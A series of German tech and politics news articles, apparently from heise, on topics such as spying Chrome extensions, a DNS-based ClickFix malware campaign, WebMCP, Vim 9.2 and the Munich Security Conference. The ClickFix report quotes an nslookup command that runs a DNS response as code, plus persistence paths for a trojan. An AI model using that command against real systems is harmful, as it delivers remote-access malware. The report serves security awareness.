IT-Forscher haben 32.000 Chrome-Erweiterungen untersucht und dabei 287 teils populäre Apps beim Ausspähen der User erwischt.
Eine IT-Forschergemeinschaft mit dem Namen „Q Continuum“ hat automatisiert zigtausende der beliebtesten Chrome-Erweiterungen untersucht. Knapp 300 davon, teils mit je vielen Millionen Installationen, liefern den Browserverlauf von Nutzerinnen und Nutzern an ihre Hersteller aus. Den Usern ist meistens wohl nicht klar, dass sie ausspioniert werden.
Die Analyse und ihre Ergebnisse stellt „Q Continuum“ in einem Github-Projekt [1] bereit. Beim Versuchsaufbau haben sie Chrome in einen Docker-Container verfrachtet und den Traffic durch einen Man-in-the-Middle-Proxy geschleust. Dabei beobachteten sie die ausgehenden Anfragen unter dem Aspekt, wie sie mit der Länge der URLs korrelieren, die dem Chrome-Browser vorgesetzt wurden. Dabei haben die IT-Forscher synthetische Browser-Daten eingesetzt, konkret konsistent geformte Anfragen an google.com, die jedoch nie den Docker-Container verlassen. Dann untersucht ein Skript die ausgehenden Daten darauf hin, wie umfangreich der abgehende Traffic ist.
Die Idee dahinter: Wenn eine Erweiterung lediglich den Seitentitel liest oder eigenes CSS in die Seite einbaut, sollte der Netzwerk-Fußabdruck niedrig bleiben, egal, wie lang die besuchte URL ist. Wenn der abgehende Traffic jedoch linear mit der URL-Länge ansteigt, liefert die Erweiterung mit hoher Wahrscheinlichkeit die URL oder die gesamte HTTP-Anfrage an einen Server ins Internet aus. Damit konnten sie Erweiterungen eingrenzen, die sehr wahrscheinlich sensible Daten ausspähen.
Hunderte teils populäre Erweiterungen spionieren
Insgesamt haben die Analysten die 32.000 populärsten Chrome-Erweiterungen von den 240.000 im Chrome-Webstore verfügbaren untersucht. Dabei haben sie 287 teils sehr populäre Kandidaten aufgespürt, die Daten exfiltrieren. Insgesamt 37,4 Millionen User haben diese Plug-ins in ihren Webbrowser installiert und werden davon ausgeforscht.
Diese Daten können zur Profilbildung und gezielter Werbung genutzt werden, aber auch zu Wirtschaftsspionage oder dem Abziehen von Zugangsdaten, erklärt das „Q Continuum“ die potenziellen Gefahren. Andererseits ist nicht jede Erweiterung automatisch auch mit bösartiger Absicht unterwegs. Auf Platz 1 findet sich etwa „Avast Online Security & Privacy“ mit sechs Millionen Installationen, ein Plug-in zur Reputationsprüfung von Webseiten. Offenbar nutzt es keine lokale Datenbank, sondern sendet die URLs zur Prüfung an die Herstellerserver. Allerdings hat gerade Avast da eine wenig rühmliche Vergangenheit: Wegen Datenweitergabe musste das Unternehmen 2024 16,5 Millionen US-Dollar Strafe [2] in den USA zahlen, da die gesammelten Daten von mehr als 100 Millionen Nutzern über die Tochterfirma Jumpshot verkauft wurden. An zweiter Stelle folgen mit je 3 Millionen Nutzern die Erweiterungen „Ad Blocker: Stands AdBlocker“ sowie „Monica: ChatGPT AI Assistant | DeepSeek, GPT-4o, Claude 3.5, o1 &More“.
Die Webseite hält eine Liste der beim Ausspähen beobachteten Chrome-Erweiterungen vor. Detaillierte Einblicke gibt das rund 260-seitige PDF [3], wovon die letzten etwa 150 Seiten jedoch lediglich Details zu den betroffenen Erweiterungen wie IDs, Namen, Nutzerzahlen und Ähnliches umfassen. Wer nicht möchte, dass die eigenen Browser-Erweiterungen den eigenen Browser-Verlauf an die Anbieter senden, sollte die Erweiterungsliste prüfen und gegebenenfalls die Add-ons deinstallieren.
Browser-Erweiterungen sind oft nützliche Helferlein, sie können jedoch auch Datenschleudern sein, die die Privatsphäre verletzen. Einige Akteure nutzen das zur eigenen Bereicherung aus, indem sie die gewonnenen Daten monetarisieren. Das Phänomen selbst ist bereits älter. Etwa 2019 hat der IT-Sicherheitsforscher Sam Jadali 200 Chrome- und Firefox-Erweiterungen angeschaut [4] und diese ebenfalls beim Datensammeln erwischt. Auf diese übertragenen Daten hatten zudem Dritte Zugriff. Bei dieser Späh-Masche mit dem Namen „DataSpii“ waren Surf-Daten von 4,1 Millionen Menschen betroffen.
URL dieses Artikels: https://www.heise.de/-11177837
Links in diesem Artikel: [1] https://github.com/qcontinuum1/spying-extensions/blob/main/README.md [2] https://www.heise.de/news/Avast-muss-wegen-Datenweitergabe-16-5-Millionen-Dollar-zahlen-9788887.html [3] https://github.com/qcontinuum1/spying-extensions/blob/main/report.pdf [4] https://www.heise.de/news/DataSpii-Browser-Addons-spionieren-Millionen-Nutzer-aus-4475506.html [5] https://pro.heise.de/security/?LPID=39555_HS1L0001_27416_999_0&wt_mc=disp.fd.security-pro.security_pro24.disp.disp.disp [6] mailto:dmk@heise.de
ClickFix-Attacken nutzen Schadcode in DNS-Antworten
Von Heise — 16. Februar 2026 um 11:40
(Bild: Skorzewiak/Shutterstock.com)
Microsoft hat eine neue Variante der Malware-Verteilung in ClickFix-Angriffen entdeckt. Die Angreifer liefern Schadcode mittels DNS aus.
Bei ClickFix-Angriffen verleiten Cyberkriminelle ihre Opfer dazu, einen Befehl auf dem Rechner auszuführen, der angeblich ein Problem lösen soll. Tatsächlich installiert der jedoch Malware aus dem Internet. Eine neue Variante setzt dabei auf DNS-Antworten zur Verteilung der Schadsoftware.
Das hat Microsofts Threat-Intelligence-Team auf Linkedin [1] bekannt gegeben. Um der Erkennung zu entgehen, setzen die Angreifer nun darauf, einen vermeintlich harmlosen „nslookup“-Befehl abzusetzen. Microsoft zeigt den Beispielaufruf von cmd /c ”nslookup example.com 84.xx.yy.zz | findstr ”^Name:” | for /f ”tokens=1,* delims=:” %a in (’more’) do @echo %b” cmd && exit\1 – dieser Befehl wird offenbar auch verschleiert mit eingeworfenen Sonderzeichen („^") überliefert.
Microsoft: DNS-Antwort enthält Schadcode
Dieser Befehl fragt beim Zielserver mit der hier verschleierten IP-Adresse nach einer Auflösung für den Domain-Namen „example.com“. Die „Name:“-Antwort verarbeitet der Befehl dann, um den Schadcode der nächsten Infektionsstufe zu empfangen und auszuführen, erklären die IT-Forscher aus dem Microsoft-Defender-Team. Dieser Angriff umgeht klassischen Malware-Schutz, zudem sieht die serverseitige DNS-Antwort für Virenschutz in der Regel unverdächtig aus – anders als üblicherweise genauer untersuchter Netzwerkverkehr etwa von Webservern.
Der Schadcode aus der DNS-Antwort lädt dann eine .zip-Datei von „hxxp://azwsappdev[.]com/“ herunter, aus dem ein Portable-Python-Bundle sowie bösartiger Python-Code extrahiert werden. Der ausgeführte Python-Code untersucht die vorgefundene Windows-Umgebung und lädt schließlich die finale Infektionsstufe nach, die als „%APPDATA%\WPy64-31401\python\script.vbs“ im Dateisystem landet und mittels „%STARTUP%/MonitoringService.lnk“ im Autostart eingerichtet wird. Es handelt sich dabei um einen Fernzugriff-Trojaner namens „ModeloRAT“.
Bei ClickFix handelt es sich um Social-Engineering-Angriffe, die in der Regel über Phishing, Malvertising oder Drive-by-Köder (etwa gefälschte Captcha- oder „Beheben Sie dieses Problem”-Dialoge) eingesetzt wird, um Benutzer dazu zu verleiten, einen Befehl zu kopieren, einzufügen und auszuführen, fasst Microsoft diese Attacken-Variante zusammen. Gegen Drahtzieher solcher Angriffe gehen auch internationale Strafverfolger immer wieder vor. So konnten im Rahmen der „Operation Endgame 2.0“ etwa hunderte Server außer Gefecht gesetzt [2] werden, die unter anderem ebenfalls für ClickFix-Attacken genutzt wurden.
URL dieses Artikels: https://www.heise.de/-11177592
Links in diesem Artikel: [1] https://www.linkedin.com/posts/microsoft-threat-intelligence_microsoft-defender-researchers-observed-attackers-activity-7428223307818340352-6OHr [2] https://www.heise.de/news/Operation-Endgame-2-0-20-Haftbefehle-Hunderte-Server-ausser-Gefecht-gesetzt-10394215.html [3] https://pro.heise.de/security/?LPID=39555_HS1L0001_27416_999_0&wt_mc=disp.fd.security-pro.security_pro24.disp.disp.disp [4] mailto:dmk@heise.de
Googles WebMCP macht Websites zu strukturierten Datenquellen für KI-Agenten
Von Heise — 16. Februar 2026 um 13:56
(Bild: heise medien)
Google hat WebMCP vorgestellt. Die JavaScript-API macht Websites zu MCP-Servern und ermöglicht KI-Agenten strukturierte Interaktionen mit der Website.
Google hat mit WebMCP (Web Model Context Protocol) eine neue JavaScript-Schnittstelle vorgestellt, über die KI-Agenten standardisiert mit Websites kommunizieren sollen. Wie Google-Entwickler André Cipriani Bandarra in einem Blogbeitrag [1] erklärt, überträgt WebMCP die Idee des Model Context Protocol auf Websites, sodass KI-Agenten im Browser strukturiert mit Webseiten interagieren können – ohne das DOM der Seite scrapen und sich durch den Code klicken zu müssen.
Über die Schnittstelle können KI-Agenten gezielt Aktionen auf Websites ausführen, beispielsweise Formulare ausfüllen, Produkte suchen und bestellen oder Flüge buchen. „WebMCP zielt darauf ab, einen Standard für strukturierte Tools bereitzustellen, um sicherzustellen, dass KI-Agenten Aktionen mit erhöhter Geschwindigkeit, Zuverlässigkeit und Präzision ausführen können“, sagt Bandarra.
WebMCP erweitert das Navigator-Interface um navigator.modelContext mit Methoden wie registerTool() und provideContext(). Google unterscheidet dabei zwischen einer deklarativen API für einfache Formular-Aktionen und einer imperativen API für komplexe JavaScript-Interaktionen. Jedes registrierte Tool benötigt einen Namen, eine Beschreibung in natürlicher Sprache, ein JSON-Schema für Eingaben sowie eine Execute-Callback-Funktion.
Unterschiede zu Microsofts NLWeb
Microsoft hatte Mitte 2025 mit NLWeb ein eigenes Open-Source-Projekt für das „agentische Web“ vorgestellt. Der zentrale Unterschied: NLWeb ist serverseitig konzipiert und macht Webseiten zu MCP-Servern mit natürlichen Sprachschnittstellen. WebMCP hingegen läuft im Browser im JavaScript-Kontext, ohne separate Backend-Komponenten.
WebMCP steht derzeit als Early Preview über Googles Early-Access-Programm für Entwickler bereit und ist in Chrome 146 als DevTrial verfügbar. Google könnte die Schnittstelle künftig in Chrome und seine KI-Dienste wie Gemini integrieren, um Browser-Agenten direkt mit Websites interagieren zu lassen.
URL dieses Artikels: https://www.heise.de/-11177824
Links in diesem Artikel: [1] https://developer.chrome.com/blog/webmcp-epp [2] https://webmachinelearning.github.io/webmcp [3] https://www.heise.de/ix [4] mailto:odi@ix.de
Cyber Resilience Act: ORC Working Group veröffentlicht erstes Whitepaper
Von Heise — 16. Februar 2026 um 11:28
(Bild: Marian Weyo/Shutterstock.com)
Im Fokus des Whitepapers steht die Rolle der Open Source Software Stewards, die im CRA erstmals als juristische Akteure in Erscheinung treten.
Die von der Eclipse Foundation gegründete Open Regulatory Compliance Working Group (ORC WG) hat ihr erstes Whitepaper veröffentlicht. Die Arbeitsgruppe – zu deren Mitgliedern namhafte Unternehmen wie Microsoft, Siemens, Red Hat und Bosch zählen – entstand durch das Aufkommen des Cyber Resilience Act (CRA), einer EU-Regulierung zur erhöhten Sicherheit von Produkten mit digitalen Elementen.
Das Whitepaper widmet sich offenen Fragen rund um die neue Rolle der im CRA genannten Open Source Software Stewards. Dabei macht die Arbeitsgruppe deutlich, dass das Whitepaper keine juristische Empfehlung ist, sondern ein kollektives Verständnis von Open-Source-Beitragenden widerspiegelt.
Open Source Software Stewards: Verantwortlichkeiten und Verpflichtungen
Wie die ORC WG in ihrem Blog betont [1], markiert der Cyber Resilience Act einen bedeutenden Wandel der Cybersecurity-Verantwortlichkeiten innerhalb des Softwareentwicklungs-Ökosystems. Open Source Software Stewards werden im CRA erstmals als juristische Akteure genannt und sind eine von Herstellern (Manufacturers) separate Kategorie. Im Gegensatz zu diesen müssen sie beispielsweise keine administrativen Geldstrafen bei Nicht-Compliance leisten. Allerdings wirft die neue Rolle einige Fragen auf, etwa was sie in der Praxis konkret bedeutet und welche genauen Verpflichtungen sie mit sich bringt.
Für das neue Whitepaper haben Mitglieder der ORC-Community den CRA-Text analysiert und interpretiert, um praktische Handlungsanweisungen und Informationen zu bieten. Konkret benennt das Whitepaper beispielsweise, in welchem Verhältnis die Stewards zu ihren unterstützten Projekten stehen und weshalb diese Rolle geschaffen wurde. Ihre Verpflichtungen kommen ebenfalls zur Sprache, und wie sich diese von jenen an Softwarehersteller unterscheiden.
Praktische Beispiele sollen zeigen, wie Open Source Software Stewards in ihren Projekten Cybersicherheitsregeln etablieren und mit Sicherheitslücken sowie deren Offenlegung umgehen können. Das Whitepaper erwähnt darüber hinaus, welche Fragen noch ungeklärt sind, etwa wie man in komplexen Fällen die geeignete Marktüberwachungsbehörde auswählt, und wo weitere regulatorische Anweisungen notwendig sind.
Auf der Website der ORC Working Group steht das 25-seitige Whitepaper „Open Source Software Stewards and CRA“ in der Version 1.0 zum Download bereit [2].
Übergreifende Fragen: Wann ist ein Steward ein Steward?
Dabei richtet sich das Whitepaper lediglich an Open-Source-Projekte, die einen Steward haben. Auf die meisten Projekte [3] trifft das nach Angaben der ORC-Arbeitsgruppe nicht zu. Ein Steward muss eine „juristische Person“ sein, was beispielsweise ein Unternehmen sein kann. Die meisten Open-Source-Projekte werden jedoch nicht von Unternehmen oder Stiftungen unterstützt. Auch dient das Dokument nicht dazu, festzustellen, ob ein Unternehmen als Steward eines Projektes gilt – oder gar als Hersteller. Solche Fragen kommen in den ORC Working Group FAQ [4] zur Sprache.
URL dieses Artikels: https://www.heise.de/-11177353
Links in diesem Artikel: [1] https://orcwg.org/blog/stewards-wp-launch/ [2] https://orcwg.org/cra/resources/d3-5-white-paper-on-open-source-software-stewards-and-cra/ [3] https://cra.orcwg.org/faq/stewards/do-all-projects-have-stewards/ [4] https://github.com/orcwg/cra-hub/blob/main/faq.md#open-source-software-stewards [5] mailto:mai@heise.de
Vim 9.2 bringt Wayland-Support und neue Vim9-Script-Features
Von Heise — 16. Februar 2026 um 11:23
(Bild: heise medien)
Der Kommandozeileneditor erhält erstmals vollständige Wayland-Unterstützung. Vim9-Script bekommt neue Datentypen, der Diff-Modus wird leistungsfähiger.
Vim 9.2 ist da: Das Release des Kommandozeileneditors bietet erstmals vollständige Unterstützung für Wayland – sowohl für die Bedienoberfläche als auch für die Zwischenablage. Damit reagiert das Projekt auf die zunehmende Verbreitung des Grafikservers unter Linux. Zugleich folgt Vim künftig der XDG Base Directory Specification und legt Konfigurationsdateien unter Linux und Unix in $HOME/.config/vim ab.
Vim9-Script, die moderne Skriptsprache des Editors, erhält neue Datentypen: Enums ermöglichen typsichere Aufzählungen, Generic Functions erlauben die Definition von Funktionen mit Typparametern und der neue Tuple-Datentyp stellt geordnete Sammlungen fester Größe bereit. Built-in Functions lassen sich nun auch als Objektmethoden verwenden. Neue Features wie geschützte _new()-Konstruktoren und der Befehl :defcompile für vollständige Methodenkompilierung runden die Spracherweiterungen ab.
Der Diff-Modus erhält einen neuen Linematch-Algorithmus, der Zeilen zwischen Puffern präziser zuordnet. Die neue Option diffanchors erlaubt es, Ankerpunkte zu setzen, um komplexe Dateien in Abschnitte zu unterteilen und diese unabhängig voneinander zu vergleichen. Das Inline-Highlighting wurde verbessert, es hebt Änderungen innerhalb einer Zeile jetzt detaillierter hervor.
Praxisnahe Verbesserungen
Bei den Default-Einstellungen hat Vim 9.2 mehrere Anpassungen vorgenommen: Der Befehlsverlauf wächst von 50 auf 200 Einträge (history), die Rücktaste verhält sich standardmäßig erwartungsgemäß (backspace auf "indent,eol,start") und die Cursor-Position sowie eingetippte Befehle werden grundsätzlich angezeigt (ruler und showcmd aktiviert). Unter GTK erhöht sich die Standardschriftgröße von 10 auf 12 Punkt, was Nutzern hochauflösender Displays entgegenkommt.
Die Insert-Mode-Completion unterstützt jetzt Fuzzy-Matching und kann Wörter direkt aus Registern vervollständigen. Die neuen Flags nosort und nearest für completeopt geben Nutzern feinere Kontrolle über Anzeige und Sortierung der Vorschläge. Ein neuer interaktiver Tutor, aufrufbar über :Tutor, soll gegenüber dem klassischen vimtutor-Programm ein moderneres Erlernen des Editors bieten.
Plattform-Optimierungen
Windows-Nutzer erhalten native Dark-Mode-Unterstützung für Menüs und Titelleisten sowie hochwertigere Toolbar-Icons. Der Vollbild-Support wurde verbessert. Als Alternative zum horizontalen Tabline bietet Vim 9.2 nun ein vertikales Tabpanel an, was bei vielen geöffneten Dateien übersichtlicher sein kann.
Contributor Yegappan Lakshmanan demonstriert in den Release Notes [1] die Möglichkeiten von Vim9-Script anhand zweier mit GitHub Copilot generierter Projekte: Eine vollständige Implementierung des Spiels Battleship zeigt den Einsatz von Klassen und Type Aliases, ein Number-Puzzle-Spiel belegt die Eignung moderner Vim9-Konstrukte für interaktive Plugins.
Das Release behebt zudem mehrere seit Vim 9.1 bekannt gewordene Sicherheitslücken, Speicherlecks und potenzielle Absturzursachen. Nach dem Tod von Vim-Erfinder Bram Moolenaar [2] im August 2023 führt Christian Brabandt das Projekt als Hauptmaintainer fort.
URL dieses Artikels: https://www.heise.de/-11177457
Links in diesem Artikel: [1] https://www.vim.org/vim-9.2-released.php [2] https://www.heise.de/news/Zum-Tode-Bram-Moolenaars-Vim-Koryphaee-Weltenbummler-und-Spendensammler-9235897.html [3] https://www.heise.de/ix [4] mailto:fo@heise.de
Beschäftigte gelten als zu teuer. Warum ausgerechnet Maschmeyers Einwurf den Zustand der Debatte offenlegt. Ein Kommentar.
Rüstungsunternehmen erleben gute Zeiten. Schlechte Zeiten dagegen herrschen fast überall sonst in der Wirtschaft.
Und so wird täglich dringlicher darüber gesprochen, wie viel Beschäftigte kosten, was sie falsch machen und was sie besser machen müssten, wenn sie nicht eingespart werden wollen. Mit diesem "sie" sind abhängig Beschäftigte gemeint – und die selbstständigen Alleinkämpfer. Beide gelten als variable Größe.
Die Selbstständigen stehen dabei oft nicht außerhalb, sondern am Tropf von Auftraggebern: ausgelagert, outgesourct, als Subunternehmer eingebunden, ohne Kündigungsschutz, aber mit Kostendruck. Sie tragen unternehmerisches Risiko, ohne unternehmerische Macht. Auch sie lassen sich kürzen.
Die großen Richtlinien der Zeit haben als Antrieb allesamt Optimierung vom Schlaf über die Arbeit bis zur Freizeit und Ernährung. Die herrschenden Denkmodi sind strategisch. Leben sollen permanent angepasst werden, um für neue Anforderungen gut aufgestellt zu sein.
Wer das nicht schafft, fällt dem Rotstift zum Opfer. Personalkosten gelten, neben Sozialabgaben, als das große Übel, das Wachstum hemmt.
Wie selbstverständlich dieser Konsens geworden ist, merkt man erst, wenn diese Narrative, die schon beinahe als naturwüchsig empfunden werden, von unerwarteter Seite irritiert werden. Zum Beispiel von Carsten Maschmeyer.
Maschmeyer, bekannt geworden mit dem Aufbau des Finanzdienstleisters AWD und heute Investor sowie Juror in der Fernsehsendung Die Höhle der Löwen, kritisiert öffentlich das dauernde Reden über angeblich zu hohe Personalkosten.
"Das Gerede über Kosten wird selbst zum Produktivitätsproblem."
Wer Mitarbeiter nur als Belastung begreife, dürfe sich über sinkende Motivation nicht wundern. Sein Satz:
"Wenn die Mitarbeiter euch nur stören, dann probiert’s doch mal ohne. "
Maschmeyer fordert, nicht von "Personalkosten", sondern von "Personalnutzen" zu sprechen. Unternehmen verdienten ihr Geld nicht trotz, sondern wegen ihrer Mitarbeiter. "Excel-Tabellen allein entwickeln nichts."
Bemerkenswert ist weniger der Inhalt als der Absender. Denn der Kostendruck auf Arbeit folgt seit Jahren einem Beratungsdenken, das Effizienz primär über Reduktion organisiert. Der von Unternehmensberatern wie McKinsey & Company geprägte Fokus auf schlanke Strukturen, Kennzahlen und Skalierbarkeit hat das Verhältnis zur Arbeit verändert: Menschen erscheinen als zu teure Variable, nicht als produktive Grundlage.
Parallel dazu läuft eine Debatte über Krankenstände. Politiker wie Friedrich Merz [2] sprechen über Anreize, Fehlzeiten und Pflichten. Über Ursachen wird seltener gesprochen.
Dass ausgerechnet ein Finanzunternehmer dieses Denken kritisiert, sagt viel über den Zustand der Debatte. Während Politik und Management weiter rechnen, scheint selbst dort, wo in Excel-Tabellen gedacht wird, angekommen zu sein:
Nicht einmal theoretisch rechnet sich eine Wirtschaft ohne Menschen.
URL dieses Artikels: https://www.heise.de/-11178013
Links in diesem Artikel: [1] https://www.welt.de/wirtschaft/article698ef36356df0f71cc0413b2/carsten-maschmeyer-wenn-die-mitarbeiter-euch-nur-stoeren-dann-probierts-doch-mal-ohne.html [2] https://www.deutschlandfunk.de/krankenstand-merz-bekommt-unterstuetzung-von-kassenaerztlicher-bundesvereinigung-100.html
Auf der Münchner Sicherheitskonferenz offenbarten sich tiefe Risse zwischen Europa und den USA. Warum freundliche Worte keinen Konsens schaffen. Eine Analyse.
"Ein tiefer Graben" habe sich aufgetan – mit diesen Worten brachte [1] Bundeskanzler Friedrich Merz am Freitag zunehmende transatlantische Spannungen auf den Punkt. Der kollektive Westen wankt gewaltig: seine geopolitische Rettung war der Leitstern der 62. Ausgabe der Münchner Sicherheitskonferenz, die am gestrigen Sonntag ihr Ende fand.
Während viele Themengebiete vorhersehbar waren – so bat [2] der ukrainische Präsident Selenskyj erneut um mehr finanziell-militärische Unterstützung –, kam insbesondere der Generalangriff der US-Administration auf die Vereinten Nationen verhältnismäßig unerwartet, hatte man doch mit einer harten Schlagseite gen Europa gerechnet.
Europa müsse, so die Worte des amerikanischen Außenministers Marco Rubio, "überleben". Seine durchaus scharfe Kritik verband [3] er mit der Forderung nach stärkerer Eigenständigkeit unter US-amerikanischer Führung. Eine versteckte Kampfansage [4] oder Konsens in München?
Eigene Agenda
Merz könnte geplant haben, einen Gegenentwurf zur Skandalrede von US-Vizepräsident JD Vance aus dem vergangenen Jahr zu halten – dieser hatte das politische Projekt Europa auf allen Ebenen kritisiert [5]. Er antwortete [6] indirekt – ein Jahr später – mit Programmatik. Neben der Warnung an die USA, ein Alleingang sei der falsche Weg, bot der CDU-Kanzler gleichsam eine neue Ebene der Partnerschaft an.
Denn er stellte klar, dass Deutschland vorangehen werde: Man bestehe jedoch auf internationale Einbettung. Europa, so der Kanzler, müsse ein "selbsttragender Pfeiler" der Nato werden – ein rüstungspolitisch forciertes neues Transatlantik-Schema.
Der Schlüssel ist altbekannt: Militarisierung sowie ein europäischer Atomschirm als von Washington unabhängige Sicherheitsarchitektur [7].
Frankreichs Präsident Macron begrüßte die deutsche Idee und stimmte vorsichtig zu [8]. Hierzu passend feierte [9] das Militärische Comeback: Neben Hinterzimmer-Großwaffen-Verhandlungen wurde bekannt, dass Kanada offiziell dem Safe-Programm beitritt [10] – ein 150-Milliarden-Abkommen, welches es nun kanadischen Firmen erlauben wird, mit europäischen Partnern Kriegsgerät zu produzieren.
Kalkulierter Bruch
Dabei brach Merz gleich mit zwei Kontinuitäten: Anstatt am traditionell für den deutschen Kanzler reservierten Samstag sprach dieser – wahrscheinlich für ein gewolltes Agenda-Setting – schon am Freitag [11]. Und wandte sich – in dieser Deutlichkeit – erstmalig öffentlich gegen die aktuellen Maga-Fantasien der US-Politblase.
In englischer Sprache wandte sich der deutsche Kanzler direkt an die im Konferenzsaal versammelte US-Delegation und sagte wörtlich: "Der Kulturkampf der Maga-Bewegung ist nicht unserer. An Klimaabkommen und Weltgesundheitsorganisation halten wir fest, weil wir überzeugt sind: Globale Aufgaben werden wir nur gemeinsam lösen."
Merz gestand zudem ein, dass der Führungsanspruch der USA "verspielt" sein könnte. Im Kern ist man mit der Rollenteilung, der prinzipiellen Schlagrichtung gegen Peking sowie dem Ziel eines auf westlichen Machterhalt ausgelegten Ordnungserhalts umfassend einverstanden.
Jedoch mahnt man Washington, den Bogen nicht zu überspannen, Schleifungen einer zum Vorteil Europas bestehenden Weltordnung wurden abgelehnt. Dies geschieht aus einer Position der relativen Schwäche: zwar kritisierte man den Trumpismus, reale Handlungsoptionen zur Durchsetzung anderer Leitlinien sind jedoch begrenzt: ein wohl-kalkulierter Bruch [12].
Die MSC kann eine Phase strategischer Neuverhandlung mit den USA darstellen. Hierbei war erforderlich, dass Russland als große Bedrohung erhalten bleibt. Immerhin hatte die finnische Außenministerin den Sinn für die Realität noch nicht verloren. Laut Elina Valtonen wisse Moskau, dass "es der Nato völlig unterlegen [13] ist".
Ukraine-Schwenk
Im US-Beitrag auffällig war, dass die Ukraine nahezu keine Rolle spielte. Rubio verzichtete [14] auf die europäischen Durchhalteparolen und machte deutlich, dass es der US-Administration ernst ist mit ihrer Fokusverschiebung. Für die USA ist das ukrainische Schlachtfeld keine Priorität.
Rubio schlug – insbesondere im Vergleich zum Vorjahresbeitrag von JD Vance [15] – nahezu leise Töne an. Dennoch bleiben die inhaltlichen Forderungen bestehen: Eigenverantwortung Europas, Kritik am Liberalismus, eine forcierte Arbeitsteilung. Statt auf militärische Unterstützung der Ukraine zu setzen, bevorzugen die USA im Unterschied zu anderen Konfliktlagen verstärkt diplomatische Lösungen.
Auslassungen
Laut dem US-Außenminister spielen [16] die Vereinten Nationen bei der Lösung internationaler Konflikte "praktisch keine Rolle". Implizit schwang Rubio die USA zur zentralen globalen Ordnungsinstanz auf: Während man – im diplomatischen Alleingang – die Krisen in Gaza, der Ukraine oder Venezuela gelöst habe, besäße die UNO "keine Antworten".
Rubio verschwieg dabei bewusst, dass die USA völkerrechtswidrig den venezolanischen Präsidenten verschleppt haben, erwähnte nicht, dass sein Land völkerrechtswidrig Verhandlungen mit der Islamischen Republik Iran herbeibombte [17]. Teheran verwies wiederholt darauf, dass man mit einem Messer an der Kehle nicht auf Augenhöhe verhandeln könne, und dass Washington seit Jahrzehnten Tel Aviv derart den Rücken stärkt, dass jegliche UN-Lösungen [18] torpediert wurden.
Rubios Rede war eine Hommage an die hegemoniale Doktrin einer Weltmacht, die Legitimität nicht aus Recht, sondern aus Handlungsfähigkeit zieht.
Der als unfähig präsentierte Multilateralismus passt den US-Herrschenden für den aktuellen Abschnitt nicht: "America First" bedeutet Verzicht auf Absprache und Konvention. Nicht, dass die USA internationale Restriktionen jemals größer geachtet hätten – siehe Afghanistan, Vietnam, Irak –, doch selbst die rhetorischen Zugeständnisse scheinen passé.
Was bleibt?
Hoffnungsvoll erscheint in diesem Zusammenhang der Auftritt des chinesischen Außenministers Wang Yi. Dieser präsentierte sein Land als stabilisierende Kraft und Verteidigerin einer regelbasierten internationalen Ordnung – allerdings einer zugunsten Pekings und des Globalen Südens reformierten [19].
Explizit forderte er Gleichberechtigung unter den Staaten sowie – im Rekurs auf Rubio – eine Stärkung der Vereinten Nationen. Als Gegenmodell zum US-Modell des Rechts des Stärkeren stellte Peking seine Global Governance Initiative vor und hob jene als Gegenmodell [20] heraus – dabei will Peking offenkundig die bestehenden transatlantischen Spannungen nutzen.
Europa könne die Avancen des attraktiven Handelspartners in der aktuellen Lage kaum ignorieren [21]. Ausdrücklich begrüßte der chinesische Beitrag eine strategische Autonomie Europas von den USA [22].
Während Europa und allen voran Deutschland die US-amerikanischen Steilvorlagen nach mehr strategischer Autonomie dankend aufnahmen, verharren die USA in ihrer Position des Unilateralismus. Die EU gefällt sich in der imperialen Arbeitsteilung – USA: China, EU: Russland.
Bestünde innerhalb der herrschenden politischen Klasse des europäischen Staatenbündnisses keine Einigkeit darüber, dass der aktuelle Kurs die Aufrechterhaltung ukrainischer Kriegsfähigkeit beinhalte und auf absehbare Zeit ein deutsch-europäischer Krieg gen Osten entfesselt werden müsse, wären die Reaktionen auf US-Positionen noch heftiger ausgefallen.
Auch die US-Position besitzt Fallstricke: Sie ist keine des Friedens – ihr dürfte es um ein Ende des kostspieligen Engagements in Europa gehen. Was nach einem temporären russisch-amerikanischen Friedensschluss mit Moskau passieren wird, dürfte Washington gleichgültig sein. Man braucht das taktische Bündnis mit Moskau temporär gegen Peking, alle Zeichen stehen dennoch auf Krieg.
URL dieses Artikels: https://www.heise.de/-11177828
Millionen für Tablets und KI an Schulen – doch Studien zeigen: Ohne Konzept kann Digitalisierung Lernen und Konzentration verschlechtern. (Teil 2 und Schluss)
Im ersten Teil dieses Berichts haben wir gesehen, wie die große Vision der digitalen Schule [1] an der Realität scheitert: an geteilten Zuständigkeiten, an bürokratischen Hürden, an Laptops, die ungenutzt in Schränken verstauben, an einem KI-Chatbot, dessen Ergebnisse Lehrer nicht verwenden können. Doch all das ist nur die Oberfläche.
Digitalisierung an Schulen: Ein wiederkehrendes Muster des Scheiterns
Was wir in Brandenburg beobachten, ist keineswegs neu. Larry Cuban, emeritierter Professor an der renommierten Stanford University und ehemaliger Oberschulrat, hat dieses Muster bereits vor Jahrzehnten beschrieben.
In seinem Buch "Lehrer und Maschinen" analysiert er die aufeinanderfolgenden Zyklen des technologischen Fortschritts in Schulen – und kommt zu einem ernüchternden Befund: Die von den Befürwortern neuer Technologien geweckten Erwartungen werden nur in geringem Maße erfüllt, und der Ablauf ist scheinbar immer derselbe.
EdTech seit Jahrzehnten: Warum neue Technologien Schulen selten verändern
Ein Zyklus beginnt, so Cuban, mit großen Versprechungen der Technikentwickler und deren Forschung. Dann nehmen die Lehrer die neuen Werkzeuge kaum an, ein wirklicher akademischer Fortschritt bleibt aus.
Dies führe immer wieder zu den gleichen Vermutungen: Es liege an der fehlenden finanziellen Ausstattung, am Widerstand der Lehrkräfte oder an der lähmenden Schulbürokratie. Dennoch würden die Behauptungen der Vorreiter von niemandem infrage gestellt.
Da die versprochenen Fortschritte weiter auf sich warten lassen, werden letztlich die Maschinen für den Misserfolg verantwortlich gemacht. Und dann? Es dauert nicht lange, dann wird den Schulen die nächste Generation der Technik verkauft, und der für die Hersteller gewinnbringende Zyklus geht von vorn los.
Die ungenutzten Laptops in Brandenburg, der verschmähte KI-Chatbot Telli, die Klagen über zu wenig Fortbildung und zu starre Förderrichtlinien – es ist, als hätte Cuban das Drehbuch für genau diese Situation geschrieben. Vor Jahrzehnten.
Doch die eigentlich beunruhigende Frage liegt noch tiefer. Sie wird in den offiziellen Dokumenten kaum gestellt, aber sie drängt sich auf, je länger man wissenschaftliche Studien wälzt: Was passiert eigentlich mit unserer Fähigkeit zu lernen und zu denken, wenn wir immer mehr davon an Maschinen abgeben?
